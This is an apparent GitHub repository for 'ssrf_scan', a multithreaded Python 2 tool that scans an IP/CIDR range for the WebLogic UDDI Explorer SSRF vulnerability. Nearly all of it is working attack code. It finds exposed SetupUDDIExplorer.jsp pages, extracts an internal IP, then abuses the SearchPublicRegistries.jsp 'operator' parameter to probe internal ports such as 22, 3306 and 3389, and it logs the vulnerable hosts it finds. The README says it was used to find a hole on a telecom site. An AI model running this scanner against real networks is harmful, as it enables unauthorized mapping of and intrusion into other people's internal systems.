├── README.md ├── sp20170906_223444.png └── ssrf_scan.py /README.md: -------------------------------------------------------------------------------- 1 | # ssrf_scan 2 | scan ssrf vulnerability of IP segment 3 | 4 | Usage:./ssrf_scan IP/CIDR –t threads 5 | 6 | Example:./ssrf_scan.py 10.20.30.0/24 –t 10 7 | 8 | 一个python爬虫工具多线程扫描ip段Weblogic-ssrf漏洞,例子中的ip是我之前挖掘出的一个电信网站的漏洞,现已被修复 9 | 10 | ![](sp20170906_223444.png) 11 | -------------------------------------------------------------------------------- /sp20170906_223444.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bipabo1l/ssrf_scan/3ed961e95d2d33f0ead9991ad91c68d47aef8ffc/sp20170906_223444.png -------------------------------------------------------------------------------- /ssrf_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding:utf-8 3 | # Author: bipabo1l 4 | 5 | import re 6 | import sys 7 | import Queue 8 | import threading 9 | import optparse 10 | import requests 11 | import time 12 | from IPy import IP 13 | 14 | printLock = threading.Semaphore(1) #lock Screen print 15 | TimeOut = 5 #request timeout 16 | ports = ['80','8080'] 17 | exp_ports = ['21','22','23','53','80','443','3306','3389','8080','7001'] 18 | 19 | #User-Agent 20 | header = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36','Connection':'close'} 21 | 22 | class scan(): 23 | 24 | def __init__(self,cidr,threads_num): 25 | self.threads_num = threads_num 26 | self.cidr = IP(cidr) 27 | #build ip queue 28 | self.IPs = Queue.Queue() 29 | for ip in self.cidr: 30 | ip = str(ip) 31 | self.IPs.put(ip) 32 | 33 | def request(self): 34 | with threading.Lock(): 35 | while self.IPs.qsize() > 0: 36 | ip = self.IPs.get() 37 | for port in ports: 38 | try: 39 | r_test = requests.Session().get('http://%s:%s/uddiexplorer/SetupUDDIExplorer.jsp'%(str(ip),str(port)),headers=header,timeout=TimeOut) 40 | if r_test.status_code == 200: 41 | #printLock.acquire() 42 | print "|%-16s|%-6s|" % (ip,port) 43 | print "+----------------+------+" 44 | regex = 'http://(.*)/uddi/uddilistener' 45 | ip_ssrf = re.findall(regex, r_test.content)[0] 46 | if ip_ssrf != '': 47 | index = ip_ssrf.index(':') 48 | ip_ssrf = ip_ssrf[:index] 49 | for exp_port in exp_ports: 50 | r = requests.Session().get('http://%s:%s/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'%(str(ip),str(port),str(ip_ssrf),str(exp_port)),headers=header,timeout=TimeOut) 51 | re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content) 52 | re_sult2 = re.findall('No route to host',r.content) 53 | re_sult3 = re.findall('but could not connect',r.content) 54 | if len(re_sult1)!=0 and len(re_sult2)==0 and len(re_sult3)==0: 55 | print "|%-16s|%-6s|%-16s|%-6s|" % (str(ip),str(port),str(ip),str(exp_port)) 56 | print "+----------------+------+----------------+------+" 57 | with open("./log/"+self.cidr.strNormal(3)+".log",'a') as f: 58 | f.write(ip+"\n") 59 | 60 | except Exception,e: 61 | printLock.acquire() 62 | finally: 63 | printLock.release() 64 | 65 | #Multi thread 66 | def run(self): 67 | for i in range(self.threads_num): 68 | t = threading.Thread(target=self.request) 69 | t.start() 70 | 71 | if __name__ == "__main__": 72 | parser = optparse.OptionParser("Usage: %prog [options] target") 73 | parser.add_option("-t", "--thread", dest = "threads_num", 74 | default = 1, type = "int", 75 | help = "[optional]number of theads,default=10") 76 | (options, args) = parser.parse_args() 77 | if len(args) < 1: 78 | parser.print_help() 79 | sys.exit(0) 80 | print "+----------------+------+----------------+------+" 81 | print "| IP |port |ssrf_ip |port |" 82 | print "+----------------+------+----------------+------+" 83 | 84 | s = scan(cidr=args[0],threads_num=options.threads_num) 85 | s.run() 86 | --------------------------------------------------------------------------------